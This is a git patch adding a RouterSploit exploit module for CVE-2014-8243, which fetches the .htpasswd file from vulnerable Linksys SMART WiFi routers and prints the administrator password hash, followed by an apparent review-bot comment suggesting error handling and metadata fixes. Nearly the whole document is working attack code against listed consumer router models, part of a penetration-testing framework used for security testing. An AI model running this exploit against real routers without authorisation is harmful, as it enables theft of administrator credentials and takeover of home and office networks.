From d43200b680599d92a6fae96cd2e89acaa380cc75 Mon Sep 17 00:00:00 2001
From: Laurent Meirlaen
Date: Sun, 27 Nov 2016 21:28:18 +0100
Subject: [PATCH] Linksys SmartWiFi htpasswd disclosure
---
 .../linksys/smartwifi_password_disclosure.py | 61 +++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py
diff --git a/routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py b/routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py
new file mode 100644
index 000000000..b6583ae46
--- /dev/null
+++ b/routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py
@@ -0,0 +1,61 @@
+from routersploit import (
+ exploits,
+ mute,
+ validators,
+ http_request,
+ print_info,
+ print_success,
+)
+
+
+class Exploit(exploits.Exploit):
+ """
+ Exploit Linksys SMART WiFi firmware
+ If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash
+ """
+ __info__ = {
+ 'name': '',
+ 'authors': [
+ 'Sijmen Ruwhof', # vulnerability discovery
+ '0BuRner', # routersploit module
+ ],
+ 'description': '',
+ 'references': [
+ 'https://www.kb.cert.org/vuls/id/447516',
+ 'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers',
+ 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243',
+ 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243',
+ ],
+ 'devices': [
+ 'Linksys EA2700 < Ver.1.1.40 (Build 162751)',
+ 'Linksys EA3500 < Ver.1.1.40 (Build 162464)',
+ 'Linksys E4200v2 < Ver.2.1.41 (Build 162351)',
+ 'Linksys EA4500 < Ver.2.1.41 (Build 162351)',
+ 'Linksys EA6200 < Ver.1.1.41 (Build 162599)',
+ 'Linksys EA6300 < Ver.1.1.40 (Build 160989)',
+ 'Linksys EA6400 < Ver.1.1.40 (Build 160989)',
+ 'Linksys EA6500 < Ver.1.1.40 (Build 160989)',
+ 'Linksys EA6700 < Ver.1.1.40 (Build 160989)',
+ 'Linksys EA6900 < Ver.1.1.42 (Build 161129)',
+ ],
+ }
+
+ target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+ port = exploits.Option(80, 'Target Port')
+
+ def run(self):
+ url = "{}:{}/.htpasswd".format(self.target, self.port)
+ response = http_request(method="GET", url=url)
+
+ print_info("Unix crypt hash: $id$salt$hashed") # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
+ print_success("Hash found:", response.text)
+
+ @mute
+ def check(self):
+ url = "{}:{}/.htpasswd".format(self.target, self.port)
+ response = http_request(method="HEAD", url=url)
+
+ if response is not None and response.status_code == 200:
+ return True
+
+ return False
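Review bot: `run()` reads `response.text` without guarding against `http_request` returning `None` or a non-200 status, although `check()` in the same hunk guards both; a timeout or unreachable host therefore raises AttributeError, and a 404 error page is reported as `Hash found:`. Mirror the check before the print calls: `if response is None or response.status_code != 200:` / `print_error("Target does not appear to be vulnerable")` / `return`, importing `print_error` alongside `print_info` if this routersploit version exports it (otherwise a plain `return` suffices). The `__info__` entries `'name'` and `'description'` are left as empty strings, so the module lists blank in the framework; fill them from the docstring, e.g. `'name': 'Linksys SMART WiFi Password Disclosure'` and a one-line description naming CVE-2014-8243. The class docstring says the target leaks an MD5 hash while `run()` prints a generic `$id$salt$hashed` crypt hint; pick one description so the operator knows what format to expect.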